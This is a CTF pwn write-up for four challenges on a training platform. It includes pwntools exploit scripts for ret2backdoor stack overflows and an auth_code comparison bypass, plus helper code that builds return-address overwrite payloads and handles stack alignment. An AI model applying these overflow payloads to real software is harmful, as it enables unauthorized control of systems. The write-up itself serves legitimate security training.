
Challenge: 浅红欺醉粉,肯信有江梅

nc to the target machine and type:

```shell
ls
cat flag
```

Challenge: 领取你的小猫娘

A plain stack overflow: the input runs past v5 on the stack, so padding up to the saved return address followed by the address of the target function is enough. Note that `system` in the script is not libc's system(): 0x401232 lies in the non-PIE binary's own .text, i.e. it is a backdoor function shipped in the binary.

```python
from pwn import *

context(os='linux', arch='amd64', log_level='debug')
p = remote("challenge.qsnctf.com", 31446)

system = 0x401232                       # backdoor function inside the binary
payload = b'a' * 0x50 + p64(system)     # 0x50 bytes reach the saved return address
p.sendline(payload)

p.interactive()
```

Challenge: 江南无所有,聊赠一枝春

The challenge description says a gift is hidden in the binary; open it in IDA and search for it.
![[gift.png]]
The overflow is right there.
exp:

```python
from pwn import *

context(os='linux', arch='amd64', log_level='debug')
p = remote("challenge.qsnctf.com", 31049)

system = 0x4011DC                       # target function inside the binary (the "gift")
payload = b'a' * 0x48 + p64(system)     # 0x48 bytes reach the saved return address
p.sendlineafter(b'gift?\n', payload)    # wait for the prompt, then send
```

```python
p.interactive()
```
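The two exploits above differ only in the padding length and the target address, so here is a small helper, added for this writeup and not part of the original scripts, that builds such a ret2backdoor payload without pwntools. It assumes the amd64 frame layout (buffer, then the 8-byte saved rbp, then the return address), so a buffer at [rbp-0x48] gives the 0x50 padding of the second challenge and [rbp-0x40] gives 0x48; the 0x40101a `ret` gadget address is a hypothetical value used only to show the alignment fix. It also flags newline bytes, which a gets()/fgets()-style read would truncate on:

```python
import struct


def ret_offset(var_offset_from_rbp):
    """Padding needed to reach the saved return address on amd64 when the
    overflowing buffer starts at [rbp - var_offset_from_rbp]: the buffer,
    then the 8-byte saved rbp, then the return address."""
    return var_offset_from_rbp + 8


def bad_bytes(payload, forbidden=(0x0a,)):
    """Offsets of bytes a line-oriented read (gets/fgets/scanf %s) stops at.
    A newline inside an address silently truncates the payload."""
    return [i for i, b in enumerate(payload) if b in forbidden]


def build_ret2func(padding, target, ret_gadget=None, filler=b'a'):
    """padding bytes, an optional `ret` gadget (re-aligns rsp to 16 bytes,
    needed when the target calls system() and crashes on a movaps), then the
    little-endian 8-byte target address, exactly what p64() would produce."""
    payload = filler * padding
    if ret_gadget is not None:
        payload += struct.pack('<Q', ret_gadget)
    payload += struct.pack('<Q', target)
    bad = bad_bytes(payload)
    if bad:
        raise ValueError('payload contains newline bytes at offsets %r' % bad)
    return payload


if __name__ == '__main__':
    # The two writeup payloads, assuming buffers at [rbp-0x48] and [rbp-0x40].
    print(build_ret2func(ret_offset(0x48), 0x401232).hex())
    print(build_ret2func(ret_offset(0x40), 0x4011DC).hex())
    # Hypothetical `ret` gadget address, for the stack-alignment case.
    print(build_ret2func(ret_offset(0x48), 0x401232, ret_gadget=0x40101a).hex())
```

If the backdoor crashes inside system() on a `movaps` instruction, the stack was misaligned when the function was entered; passing `ret_gadget` inserts one extra `ret` so rsp is 16-byte aligned again.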

Challenge: 借的东风破金锁

Open the binary in IDA and look at the if condition. Click through to auth_code: its value is 53514E55435446h.

```
.data:0000000000004010 46 54 43 55 4E 51 53 00       auth_code dq 53514E55435446h
```

Fed it to an AI to convert it into little-endian byte order. (The byte dump IDA prints next to the definition, 46 54 43 55 4E 51 53 00, is already the in-memory little-endian order of that qword, so it can be copied straight into the payload; `p64(0x53514E55435446)` in pwntools produces the same eight bytes, including the trailing NUL.)
![[ai.png]]
exp:

```python
from pwn import *

p = remote('challenge.qsnctf.com', 32742)
# p = process('./key')   # local testing

# auth_code as laid out in memory: the qword 0x53514E55435446 in
# little-endian order, followed by filler for the rest of the read
payload = b'\x46\x54\x43\x55\x4E\x51\x53\x00' + b'A' * 8

p.sendline(payload)

p.interactive()
```
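To show what the endianness step above actually does, here is an added example (not code from the original writeup) that derives the payload bytes from the qword IDA displays and emulates the comparison. The shape of the check, `*(uint64_t *)buf == auth_code`, is an assumption about the binary; the constant and the `b'A' * 8` filler are taken from the writeup:

```python
import struct

# The qword exactly as IDA prints it (most significant byte first).
AUTH_CODE = 0x53514E55435446


def qword_bytes(value):
    """The 8 bytes of `value` as they sit in memory on x86-64 (little-endian);
    the same thing pwntools' p64() returns."""
    return struct.pack('<Q', value)


def auth_payload(extra=b'A' * 8):
    """The input the writeup sends: the in-memory bytes of auth_code
    followed by filler (b'A'*8 is copied from the writeup's exp)."""
    return qword_bytes(AUTH_CODE) + extra


def passes_check(user_input, auth_code=AUTH_CODE):
    """Emulates `if (*(uint64_t *)buf == auth_code)` (assumed shape of the
    check): the first 8 input bytes are read back as a little-endian qword."""
    if len(user_input) < 8:
        return False
    return struct.unpack('<Q', user_input[:8])[0] == auth_code


if __name__ == '__main__':
    print(qword_bytes(AUTH_CODE).hex(' '))      # matches IDA's byte dump
    print(qword_bytes(AUTH_CODE)[:7].decode())  # the ASCII those bytes spell
    print(passes_check(auth_payload()))
    print(passes_check(struct.pack('>Q', AUTH_CODE)))  # big-endian order fails
```

Sending the digits of the constant in the order IDA prints them (big-endian) fails the comparison; the bytes must go out in the order they occupy memory, which is why the dump column next to the `dq` line is the thing to copy.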